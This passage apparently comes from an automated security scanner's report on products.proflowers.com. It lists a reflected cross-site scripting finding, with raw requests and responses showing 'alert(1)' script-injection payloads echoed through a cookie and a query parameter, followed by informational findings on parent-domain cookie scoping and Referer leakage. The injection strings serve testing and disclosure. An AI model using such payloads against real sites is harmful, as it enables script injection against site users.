Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:20:39 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:20:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:20:39 GMT
Content-Length: 141634


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
";
           }
           s.eVar37=cleanString("PFC:Product:30003767_The Ultimate Office Plant");
           s.eVar51="PBS";
           s.events = "prodView,event5,event22,event23";
           s.products=";30003767;;;event5=1|event22=6ff98b\\";alert(1)//1f7c8e9547f|event23=0.00";
       }

   </script>
...[SNIP]...

1.7. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4f5</script><script>alert(1)</script>3d893853418 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:13:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:13:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:06 GMT
Content-Length: 143391


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
=100000;
resx.event="Product";
resx.links="30050137;5519;42864;";
resx.itemid = "30050137";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "HPC";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

2.2. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

2.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including Deluxe Mother...s Day Bouquet from ProFlowers.com. Flowers and gifts are available for any holiday or occas
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_carousel&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
